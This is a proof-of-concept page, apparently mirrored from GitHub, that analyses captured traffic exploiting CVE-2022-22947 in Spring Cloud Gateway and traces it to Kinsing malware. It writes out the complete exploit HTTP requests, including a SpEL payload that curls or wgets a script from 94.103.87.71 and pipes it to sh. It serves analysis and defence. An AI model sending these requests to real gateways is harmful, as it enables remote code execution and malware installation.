POC详情: 48d4539e8a2d7e9afd8713196e5f40c5571f9439

来源
https://github.com/Sumitpathania03/CVE-2022-22947
关联漏洞
标题: VMware Spring Cloud Gateway 代码注入漏洞 (CVE-2022-22947)
描述:VMware Spring Cloud Gateway是美国威睿(VMware)公司的提供了一个用于在 Spring WebFlux 之上构建 API 网关的库。 VMware Spring Cloud Gateway 存在代码注入漏洞,远程攻击者可利用该漏洞发出恶意的请求并允许在远程主机上执行任意远程命令。
介绍
# CVE-2022-22947
CVE-2022-22947 
(Spring-Cloud-Gateway)
In the first quarter of 2022, an interesting and critical (base score of 10.0) Spring Cloud Gateway Code Injection vulnerability was discovered leveraging the Actuator API to perform SpEL Injection, potentially leading to system compromise.
Spring cloud gateway versions prior to 3.1.1+ and 3.0.7+
In spring cloud gateway, applications are vulnerable to a code injection attack 
IF:The Gateway Actuator endpoint is enabled, exposed and unsecured. 

## VULNERABILITY FLOW GRAPH 
![spring](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/18e9142e-a2b1-4708-abdd-bfebab060841)













## PCAP ANALYSIS
1.ATTACKER WILL SEND A POST REQUEST + JSON  FOR NEW ROUTE CREATION IN THE GATEWAY AND WITH THE JSON CONFIG FILE IT IS CONFIGURING RESPONSE HEADER OF THAT ROUTE

```
POST /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 372

{"id": "BuOHOGeywH", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 127.0.0.1/sum||wget -q -O- sum/scg.sh)|sh\"}).getInputStream()))}"}}], "uri": "http://example.com", "order": 0}
```
RESPONSE:
```
HTTP/1.1 201 Created Location: /routes/xwpdsdeb content-length: 0

AS WE CAN SEE IN JSON FILE , WE ARE GETTING VALUE OF RESPONSE HEADER BY EXECUITING THIS EXPRESSION 
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 127.0.0.1/sum||wget -q -O- sum/scg.sh)|sh\"}).getInputStream()))}"}}]
```
AND WE CAN SEE IN THE exec( ) method there is a composite command to Remote code execution.

2.THEN ATTACKER SENDS A POST REQUEST TO REFRESH ALL THE ROUTES
```
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 0
```
RESPONSE:
```
HTTP/1.1 200 OK
```
3.THEN THE ATTACKER SENDS A GET REQUEST ON THE NEWLY CREATED ROUTE TO EXECUITE THE RCE COMMAND IN THE RESPONSE HEADER
```
GET /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
 ```
RESPONSE:
```
HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 27 Dec 2023 09:45:00 UTC
Content-Length: 202

{"predicate": "RouteDefinitionRouteLocator$$Lambda$1046/0x0000000840610840", "route_id": "xwpdsdeb", "filters": ["[[AddResponseHeader Result = ''], order = 1]"], "uri": "10.0.2.15/xwpdsdeb", "order": 0}
```
RESPONSE 200 OK INDICATES THAT THE RCE COMMAND HAS BEEN SUCESSFULLY EXECUITED 



4.THEN THE ATTACKER WILL SEND A DELETE REQUEST TO DELETE THAT ROUTE
```
DELETE /actuator/gateway/routes/xwpdsdeb HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 0
```
RESPONSE:
```
HTTP/1.1 200 OK CONNECTION: close
Date: Wed, 27 Dec 2023 09:45:01 UTC
Content-Length: 4855
HTTP 200 OK INDICATED THAT ROUTE HAS BEEN DELETED SUCESSFULLY 
```


## LOG_DATA



##DECODED SHELLCODE: 
```
POST /actuator/gateway/routes/BuOHOGeywH HTTP/1.1
Host: 180.188.253.170:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 411
Content-Type: application/json
Accept-Encoding: gzip

{
	 "id": "BuOHOGeywH",
	 "filters": [{
	   "name": "AddResponseHeader",
	   "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 94.103.87.71/scg.sh||wget -q -O- 94.103.87.71/scg.sh)|sh\"}).getInputStream()))}"}
	   }],
	 "uri": "http://example.com",
	 "order": 0
	}
```
AFTER DECODING THIS SHELLCODE I FOUND A WGET URL OF A SCRIPT THEN, I MANUALLY DOWNLOAD THAT SCRIPT AND AFTER ANAYLISING THAT SCRIPT I FOUND AN DOWNLOAD URL OF KINSING MALWARE


![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/52410dba-8ead-4cad-8c08-d165c23eb1ad)


AND FROM THAT URL I HAVE DOWNLOADED KINSING MALWARE IN A ZIP FILE FOR FURTHER ANALYSIS THEN AFTER THAT I HAVE ANYLSED 
MD5 VALUE=787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c 
OF THAT MALWARE AND HERE IS WHAT I GOT

![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/b8837566-43cd-4349-8a27-1681b59cab7b)


![SP](https://github.com/Sumitpathania03/CVE-2022-22947/assets/126046383/1802b812-62e6-430a-8851-22aa32ff16e7)
文件快照

 [4.0K]  /data/pocs/48d4539e8a2d7e9afd8713196e5f40c5571f9439
├── [5.2K]  README.md
└── [896K]  spring_cloud_report.docx

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。